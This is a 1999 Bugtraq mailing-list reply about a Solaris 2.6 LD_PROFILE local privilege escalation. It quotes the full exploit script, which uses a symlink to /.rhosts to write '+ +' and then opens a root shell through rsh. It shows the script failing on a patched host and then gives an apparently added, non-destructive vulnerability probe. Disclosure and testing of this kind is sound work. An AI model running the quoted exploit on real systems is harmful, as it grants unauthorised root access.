[11983] in bugtraq
Re: LD_PROFILE local root exploit for solaris 2.6
daemon@ATHENA.MIT.EDU (Brock Sides)
Thu Sep 23 20:18:01 1999
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.9909231641090.8553-100000@koala.towery.com>
Date: Thu, 23 Sep 1999 16:43:51 -0500
Reply-To: Brock Sides <bsides@TOWERY.COM>
From: Brock Sides <bsides@TOWERY.COM>
X-To: Steve Mynott <steve@TIGHTROPE.DEMON.CO.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19990922211439.A654@tightrope.demon.co.uk>
On Wed, 22 Sep 1999, Steve Mynott wrote:
> works on solaris 2.6 sparc anyway...
>
> #! /bin/ksh
> # LD_PROFILE local root exploit for solaris
> # steve@tightrope.demon.co.uk 19990922
> umask 000
> ln -s /.rhosts /var/tmp/ps.profile
> export LD_PROFILE=/usr/bin/ps
> /usr/bin/ps
> echo + + > /.rhosts
> rsh -l root localhost csh -i
Not on my system:
[brock@agfa brock]$ uname -a
SunOS agfa 5.6 Generic_105181-16 sun4m sparc SUNW,SPARCstation-20
[brock@agfa brock]$ cat r00t.sh
#! /bin/ksh
# LD_PROFILE local root exploit for solaris
# steve@tightrope.demon.co.uk 19990922
umask 000
ln -s /.rhosts /var/tmp/ps.profile
export LD_PROFILE=/usr/bin/ps
/usr/bin/ps
echo + + > /.rhosts
rsh -l root localhost csh -i
[brock@agfa brock]$ ./r00t.sh
PID TTY TIME CMD
22565 pts/5 0:00 r00t.sh
22484 pts/5 0:01 bash
./r00t.sh[8]: /.rhosts: cannot create
permission denied
[brock@agfa brock]$
--
Brock Sides
Unix Systems Administration
Towery Publishing
bsides@towery.com
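A non-destructive way to settle "works here / not on my system" without aiming the symlink at /.rhosts. This is an added probe, not code from either post: it repeats the posted script's steps (umask 000, a /var/tmp/ps.profile symlink, LD_PROFILE pointed at the set-uid ps) but points the symlink at a scratch file in a directory the caller owns. If the runtime linker creates that file, ls -l shows the owner and mode it came out with; if it does not, the box behaves like the transcript above, where the shell could not create /.rhosts. The /var/tmp/<basename>.profile output location is taken from the posted script, not verified independently, and the names PROG, profile_path and ld_profile_probe are this example's own. Run it as an ordinary user; as root it proves nothing.

```shell
#! /bin/ksh
# Added probe for the LD_PROFILE/symlink problem in this thread (not from
# either post). Same steps as the posted script, but the profile symlink
# points at a scratch file in a directory we own, so nothing privileged is
# touched. A file created there by a set-uid ps (and, under umask 000,
# world-writable) means the linker followed our symlink as root.
#
# Assumption carried over from the posted script: the linker writes its
# output to /var/tmp/<basename of the program>.profile.

PROG=${PROG:-/usr/bin/ps}

# Path the profiling runtime linker would use for $1 (assumed layout).
profile_path() {
    echo "/var/tmp/$(basename "$1").profile"
}

# Probe $1. Prints VULNERABLE, NOT_VULNERABLE or UNTESTABLE and returns
# 0, 1 or 2 respectively. Always removes the symlink and scratch file it made.
ld_profile_probe() {
    prog=$1
    link=$(profile_path "$prog")
    scratch=${TMPDIR:-/tmp}/ldprobe.$$
    target=$scratch/probe

    if [ ! -x "$prog" ]; then
        echo "UNTESTABLE: $prog is not executable here"
        return 2
    fi
    # Refuse to clobber an existing profile file (or somebody else's symlink).
    if [ -h "$link" ] || [ -e "$link" ]; then
        echo "UNTESTABLE: $link already exists"
        return 2
    fi
    mkdir -m 700 "$scratch" || { echo "UNTESTABLE: cannot create $scratch"; return 2; }
    if ! ln -s "$target" "$link"; then
        rmdir "$scratch"
        echo "UNTESTABLE: cannot create symlink $link"
        return 2
    fi

    # umask 000 as in the posted script: a file the linker creates inherits it.
    ( umask 000; LD_PROFILE="$prog" "$prog" </dev/null >/dev/null 2>&1 ) || :

    if [ -e "$target" ]; then
        ls -l "$target"          # who owns it, and the mode it was created with
        result=VULNERABLE; probe_rc=0
    else
        result=NOT_VULNERABLE; probe_rc=1
    fi
    rm -f "$link" "$target"
    rmdir "$scratch"
    echo "$result"
    return $probe_rc
}

# Run the probe when executed as a script; the exit status mirrors the verdict.
ld_profile_probe "$PROG"
```

UNTESTABLE covers the cases where the probe cannot say anything either way: the program is missing, /var/tmp is not writable, or a ps.profile entry already exists there, which is itself worth a look since the posted script leaves one behind.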